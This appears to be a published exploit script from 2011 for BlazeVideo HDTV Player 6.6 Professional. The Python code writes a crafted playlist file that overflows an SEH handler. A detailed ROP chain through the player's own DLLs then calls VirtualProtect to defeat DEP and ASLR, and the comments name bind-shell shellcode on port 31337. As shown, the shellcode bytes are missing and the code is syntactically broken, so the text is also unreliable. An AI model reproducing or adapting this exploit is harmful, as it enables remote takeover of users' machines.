BlazeVideo HDTV Player 6.6 Professional - Universal ASLR + DEP Bypass

Publish Date: 07 Oct 2011
Author: modpr0be

                # Exploit Title: BlazeVideo HDTV Player 6.6 Professional (Universal DEP+ASLR Bypass)
# Author: modpr0be
# Software Download:
# Date: 07/10/2011
# Tested on: Windows XP SP3, Windows Vista SP2, Windows 7 SP1
# Thanks: corelanc0d3r, cyb3r.anbu, otoy, sickness, 5m7x, loneferret, _sinn3r, mr_me

# Take a look at :) awesome tool developed by corelanc0d3r and his team: 

# this is the old fashioned bug, i just try to make it universal :)
# it has also been exploited by:
# Greg Linares:
# LiquidWorm:
# hack4love:
# ThEg0bL!N:


import struct
file = 'blazevideo-universal.plf'

totalsize = 5000
junk = 'A' * 872
align = 'B' * 136

#we don't need nseh
seh = struct.pack('<L', 0x6130534a) 	 # ADD ESP,800 # RETN    ** [DTVDeviceManager.dll]
rop = struct.pack('<L', 0x61326003) * 10 # RETN (ROP NOP) [DTVDeviceManager.dll]
rop+= struct.pack('<L', 0x6405347a)	 # POP EDX # RETN 	** [MediaPlayerCtrl.dll]
rop+= struct.pack('<L', 0x10011108)	 # ptr to &VirtualProtect() [IAT SkinScrollBar.Dll]
rop+= struct.pack('<L', 0x64010503)	 # PUSH EDX # POP EAX # POP ESI # RETN    ** [MediaPlayerCtrl.dll]
rop+= struct.pack('<L', 0x41414141)	 # Filler (compensate)
rop+= struct.pack('<L', 0x6160949f) 	 # MOV ECX,DWORD PTR DS:[EDX] # POP ESI # POP EBP # MOV DWORD PTR DS:[EAX],ECX # POP EBX # RETN 0C    ** [EPG.dll]
rop+= struct.pack('<L', 0x41414141) * 3	 # Filler (compensate)
rop+= struct.pack('<L', 0x61604218) 	 # PUSH ECX # ADD AL,5F # XOR EAX,EAX # POP ESI # RETN 0C    ** [EPG.dll]
rop+= struct.pack('<L', 0x41414141) * 3  # Filler (RETN offset compensation)
rop+= struct.pack('<L', 0x6403d1a6)	 # POP EBP # RETN [MediaPlayerCtrl.dll] 
rop+= struct.pack('<L', 0x41414141) * 3  # Filler (RETN offset compensation)
rop+= struct.pack('<L', 0x6161055A)	 # & push esp #  ret 0c [EPG.dll]
rop+= struct.pack('<L', 0x61323EA8) 	 # POP EAX # RETN    ** [DTVDeviceManager.dll]
rop+= struct.pack('<L', 0xA139799D) 	 # 0x00000501-> ebx
rop+= struct.pack('<L', 0x640203fc) 	 # ADD EAX,5EC68B64 # RETN    ** [MediaPlayerCtrl.dll]
rop+= struct.pack('<L', 0x6163d37b) 	 # PUSH EAX # ADD AL,5E # POP EBX # RETN    ** [EPG.dll]
rop+= struct.pack('<L', 0x61626807) 	 # XOR EAX,EAX # RETN    ** [EPG.dll]
rop+= struct.pack('<L', 0x640203fc) 	 # ADD EAX,5EC68B64 # RETN    ** [MediaPlayerCtrl.dll]
rop+= struct.pack('<L', 0x6405347a) 	 # POP EDX # RETN    ** [MediaPlayerCtrl.dll]
rop+= struct.pack('<L', 0xA13974DC)	 # 0x00000040-> edx
rop+= struct.pack('<L', 0x613107fb) 	 # ADD EDX,EAX # MOV EAX,EDX # RETN    ** [DTVDeviceManager.dll]
rop+= struct.pack('<L', 0x61601fc0)	 # POP ECX # RETN [EPG.dll]
rop+= struct.pack('<L', 0x60350340)	 # &Writable location [AviosoftDTV.exe]
rop+= struct.pack('<L', 0x61329e07)	 # POP EDI # RETN [DTVDeviceManager.dll] 
rop+= struct.pack('<L', 0x61326003)	 # RETN (ROP NOP) [DTVDeviceManager.dll]
rop+= struct.pack('<L', 0x61606595)	 # POP EAX # RETN ** [EPG.dll] 
rop+= struct.pack('<L', 0x90909090)	 # nop
rop+= struct.pack('<L', 0x61620CF1)	 # PUSHAD # RETN [EPG.dll] 

nop = '\x90' * 32

# windows/shell_bind_tcp - 368 bytes
# Encoder: x86/shikata_ga_nai
# VERBOSE=false, LPORT=31337, RHOST=, EXITFUNC=process, 

shellcode = (

sisa = 'C' * (totalsize - len(seh+rop+nop+shellcode))
payload = junk+seh+align+rop+nop+shellcode+sisa

f = open(file,'w')
print "Author: modpr0be"
print "File",file, "successfully created"